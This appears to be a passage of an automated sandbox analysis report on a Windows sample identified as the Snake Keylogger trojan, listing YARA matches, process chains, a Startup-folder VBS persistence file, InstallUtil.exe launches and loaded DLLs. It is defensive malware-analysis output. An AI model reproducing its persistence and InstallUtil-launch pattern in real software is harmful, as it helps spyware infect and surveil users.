                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052E38A83_2_052E38A8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052E38983_2_052E3898
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052FA0F83_2_052FA0F8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054B03D53_2_054B03D5
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054BDAC03_2_054BDAC0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054B9AEC3_2_054B9AEC
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054B74003_2_054B7400
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054BA74C3_2_054BA74C
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054BA7583_2_054BA758
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054B00403_2_054B0040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054B00063_2_054B0006
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054BF0B83_2_054BF0B8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054B73F03_2_054B73F0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_054BDDE73_2_054BDDE7
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0555E1203_2_0555E120
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_055400403_2_05540040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_055400063_2_05540006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_006242FD4_2_006242FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_006221F84_2_006221F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_006222084_2_00622208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228D2784_2_0228D278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_022853704_2_02285370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228C1474_2_0228C147
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228C7384_2_0228C738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228C4684_2_0228C468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228CA084_2_0228CA08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_022869A04_2_022869A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228E9884_2_0228E988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_02283E094_2_02283E09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228CFAA4_2_0228CFAA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_02286FC84_2_02286FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228CCD84_2_0228CCD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_02289DE04_2_02289DE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_02283AA14_2_02283AA1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228F9614_2_0228F961
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0228E97A4_2_0228E97A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_022829EC4_2_022829EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_022839EF4_2_022839EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E694084_2_05E69408
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E651084_2_05E65108
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E618504_2_05E61850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E69AD84_2_05E69AD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E62A104_2_05E62A10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6ED204_2_05E6ED20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6ED104_2_05E6ED10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E68C804_2_05E68C80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E68C704_2_05E68C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E4004_2_05E6E400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6DF614_2_05E6DF61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6DF704_2_05E6DF70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F6404_2_05E6F640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D6414_2_05E6D641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D6504_2_05E6D650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F6314_2_05E6F631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D1C04_2_05E6D1C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F1A04_2_05E6F1A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F1B04_2_05E6F1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D1B04_2_05E6D1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E650FE4_2_05E650FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E8804_2_05E6E880
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E8904_2_05E6E890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E600404_2_05E60040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E618414_2_05E61841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6003F4_2_05E6003F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6E3F04_2_05E6E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E693F84_2_05E693F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E60B204_2_05E60B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E60B304_2_05E60B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6DAE04_2_05E6DAE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6FAC14_2_05E6FAC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6FAD04_2_05E6FAD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6DAD14_2_05E6DAD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E62A004_2_05E62A00
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1328913885.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJurfzqn.exe0 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002BB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHlrtmvgi.dll" vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000000.1316815148.0000000000312000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJurfzqn.exe0 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1351346370.0000000004D70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHlrtmvgi.dll" vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exeBinary or memory string: OriginalFilenameJurfzqn.exe0 vs pbgjw8i8N7.exe
                      Source: pbgjw8i8N7.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: pbgjw8i8N7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: XsdType.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: pbgjw8i8N7.exe, XsdType.exe.0.drBinary or memory string: application/vnd.openxmlformats-officedocument.presentationml.slide.slk1application/vnd.ms-excel.sln
                      Source: pbgjw8i8N7.exe, XsdType.exe.0.drBinary or memory string: .csproj.css
                      Source: pbgjw8i8N7.exe, XsdType.exe.0.drBinary or memory string: .vbproj.vbs
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs"
                      Source: pbgjw8i8N7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: pbgjw8i8N7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: pbgjw8i8N7.exeVirustotal: Detection: 70%
                      Source: pbgjw8i8N7.exeReversingLabs: Detection: 63%
                      Source: pbgjw8i8N7.exeString found in binary or memory: .aiff.airwapplication/vnd.adobe.air-application-installer-package+zip.amc%application/x-mpeg
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeFile read: C:\Users\user\Desktop\pbgjw8i8N7.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\pbgjw8i8N7.exe "C:\Users\user\Desktop\pbgjw8i8N7.exe"
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\XsdType.exe "C:\Users\user\AppData\Roaming\XsdType.exe"
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\XsdType.exe "C:\Users\user\AppData\Roaming\XsdType.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
